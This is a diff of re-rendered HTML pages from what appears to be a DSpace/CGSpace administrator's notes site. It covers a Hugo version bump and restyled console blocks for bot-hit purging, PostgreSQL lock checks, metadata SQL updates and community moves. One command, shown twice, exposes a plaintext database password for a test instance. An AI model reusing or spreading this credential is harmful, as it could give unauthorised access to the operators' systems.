Purging 945 hits from 52.124.19.190 in statistics
Purging 933 hits from 216.213.28.138 in statistics
Purging 930 hits from 216.41.234.163 in statistics
Purging 4410 hits from 45.146.166.173 in statistics
Purging 2688 hits from 45.134.26.171 in statistics
Purging 1130 hits from 45.146.164.123 in statistics
Purging 536 hits from 45.155.205.231 in statistics
Purging 10676 hits from 195.54.167.122 in statistics
Purging 1350 hits from 54.76.137.83 in statistics
Purging 1240 hits from 34.253.119.85 in statistics
Purging 2879 hits from 34.216.201.131 in statistics
Purging 2909 hits from 54.203.193.46 in statistics
Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 37959
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
</span></span><span style="display:flex;"><span>Purging 1190 hits from 216.213.28.136 in statistics
</span></span><span style="display:flex;"><span>Purging 1128 hits from 207.182.27.191 in statistics
</span></span><span style="display:flex;"><span>Purging 1095 hits from 216.41.235.187 in statistics
</span></span><span style="display:flex;"><span>Purging 1087 hits from 216.41.232.169 in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from 216.41.235.186 in statistics
</span></span><span style="display:flex;"><span>Purging 945 hits from 52.124.19.190 in statistics
</span></span><span style="display:flex;"><span>Purging 933 hits from 216.213.28.138 in statistics
</span></span><span style="display:flex;"><span>Purging 930 hits from 216.41.234.163 in statistics
</span></span><span style="display:flex;"><span>Purging 4410 hits from 45.146.166.173 in statistics
</span></span><span style="display:flex;"><span>Purging 2688 hits from 45.134.26.171 in statistics
</span></span><span style="display:flex;"><span>Purging 1130 hits from 45.146.164.123 in statistics
</span></span><span style="display:flex;"><span>Purging 536 hits from 45.155.205.231 in statistics
</span></span><span style="display:flex;"><span>Purging 10676 hits from 195.54.167.122 in statistics
</span></span><span style="display:flex;"><span>Purging 1350 hits from 54.76.137.83 in statistics
</span></span><span style="display:flex;"><span>Purging 1240 hits from 34.253.119.85 in statistics
</span></span><span style="display:flex;"><span>Purging 2879 hits from 34.216.201.131 in statistics
</span></span><span style="display:flex;"><span>Purging 2909 hits from 54.203.193.46 in statistics
</span></span><span style="display:flex;"><span>Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 37959
</span></span></code></pre></div><!-- raw HTML omitted -->

View File

@ -24,7 +24,7 @@ Start a full harvest on AReS
Start a full harvest on AReS
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -122,12 +122,12 @@ Start a full harvest on AReS
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2022-01-06-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Jones, Chris&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span>
</code></pre></div><h2 id="2022-01-09">2022-01-09</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-01-06-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Jones, Chris&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
</span></span><span style="display:flex;"><span>&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span>
</span></span></code></pre></div><h2 id="2022-01-09">2022-01-09</h2>
<ul>
<li>Validate and register CGSpace on <a href="https://www.openarchives.org/Register/ValidateSite?log=Z2V7WCT7">OpenArchives</a>
<ul>
@ -147,21 +147,21 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63
<ul>
<li>I tried to re-build the Docker image for OpenRXV and got an error in the backend:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
&gt; openrxv-backend@0.0.1 build
&gt; nest build
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
</span></span><span style="display:flex;"><span>&gt; nest build
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</span></span></code></pre></div><ul>
<li>Ah, it seems the code on the server was slightly out of date
<ul>
<li>I checked out the latest master branch and it built</li>
@ -180,20 +180,20 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (3506 rows)
1 application_name
9 psql
10
3487 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (3506 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 10
</span></span><span style="display:flex;"><span> 3487 dspaceWeb
</span></span></code></pre></div><ul>
<li>As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the <code>log_lock_waits</code> setting last month:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
12
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>12
</span></span></code></pre></div><ul>
<li>I set a system alert on DSpace and then restarted the server</li>
</ul>
<h2 id="2022-01-20">2022-01-20</h2>
@ -204,8 +204,8 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-01-20-green-covers.map
</code></pre></div><h2 id="2022-01-21">2022-01-21</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-01-20-green-covers.map
</span></span></code></pre></div><h2 id="2022-01-21">2022-01-21</h2>
<ul>
<li>Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
<ul>
@ -243,21 +243,21 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</li>
<li>Normalize the metadata <code>text_lang</code> attributes on CGSpace database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2803350
en | 6232
| 3200
fr | 2
vn | 2
92 | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;92&#39;, &#39;&#39;);
UPDATE 9433
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2803350
</span></span><span style="display:flex;"><span> en | 6232
</span></span><span style="display:flex;"><span> | 3200
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> 92 | 1
</span></span><span style="display:flex;"><span> sp | 1
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(8 rows)
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;92&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 9433
</span></span></code></pre></div><ul>
<li>Then export the WLE Journal Articles collection again so there are fewer columns to mess with</li>
</ul>
<h2 id="2022-01-26">2022-01-26</h2>
@ -273,7 +273,7 @@ UPDATE 9433
</ul>
</li>
</ul>
<pre tabindex="0"><code>cells['dcterms.bibliographicCitation[en_US]'].value.split(&quot;doi: &quot;)[1]
<pre tabindex="0"><code>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.split(&#34;doi: &#34;)[1]
</code></pre><ul>
<li>I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don&rsquo;t put DOIs in the citation so it&rsquo;s not possible to fix items that are missing DOIs that way
<ul>
@ -286,17 +286,17 @@ UPDATE 9433
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (537 rows)
1 application_name
9 psql
51 dspaceApi
477 dspaceWeb
$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
3
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (537 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 51 dspaceApi
</span></span><span style="display:flex;"><span> 477 dspaceWeb
</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>3
</span></span></code></pre></div><ul>
<li>I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
<ul>
<li>The issue in Francesca&rsquo;s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!</li>
@ -344,19 +344,19 @@ $ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgr
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.contains(/:\s?\d+(-|)\d+/)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.contains(/:\s?\d+(-|)\d+/)
</span></span></code></pre></div><ul>
<li>Then I faceted by blank on <code>dcterms.extent</code> and did a transform to extract the page information for over 1,000 items!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&#39;p. &#39; +
cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
&#39;-&#39; +
cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#39;p. &#39; +
</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
</span></span><span style="display:flex;"><span>&#39;-&#39; +
</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
</span></span></code></pre></div><ul>
<li>Then I did similar for <code>cg.volume</code> and <code>cg.issue</code>, also based on the citation, for example to extract the &ldquo;16&rdquo; from &ldquo;Journal of Blah 16(1)&rdquo;, where &ldquo;16&rdquo; is the second capture group in a zero-based match:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
</span></span></code></pre></div><ul>
<li>This was 3,000 items so I imported the changes on CGSpace 1,000 at a time&hellip;</li>
</ul>
<!-- raw HTML omitted -->

View File

@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -138,44 +138,44 @@ We agreed to try to do more alignment of affiliations/funders with ROR
<ul>
<li>I moved a bunch of communities:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115089
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115087
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/108598
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/1
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/35697 --child<span style="color:#f92672">=</span>10568/80211
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2517
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10947/2517
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/89416
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/3530
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80099
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80100
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/34494
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/114644
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/16573
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/42211
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/109945
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/16498
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/99453
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/2983
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/133
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/1208
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/1208
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/56924
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/56924
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/91688
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10568/91688
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2515
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10947/2515
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115089
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115087
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/108598
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/1
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/35697 --child<span style="color:#f92672">=</span>10568/80211
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2517
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10947/2517
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/89416
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/3530
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80099
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80100
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/34494
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/114644
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/16573
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/42211
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/109945
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/16498
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/99453
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/2983
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/133
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/1208
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/1208
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/56924
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/56924
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/91688
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10568/91688
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2515
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10947/2515
</span></span></code></pre></div><ul>
<li>Remove CPWF and CTA subjects from the Discovery facets</li>
<li>Start a full Discovery index on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 275m15.777s
user 182m52.171s
sys 2m51.573s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 275m15.777s
</span></span><span style="display:flex;"><span>user 182m52.171s
</span></span><span style="display:flex;"><span>sys 2m51.573s
</span></span></code></pre></div><ul>
<li>I got a request to confirm validation of CGSpace on openarchives.org, with the requestor&rsquo;s IP being 128.84.116.66
<ul>
<li>That is at Cornell&hellip; hmmmm who could that be?!</li>
@ -192,8 +192,8 @@ sys 2m51.573s
</ul>
</li>
</ul>
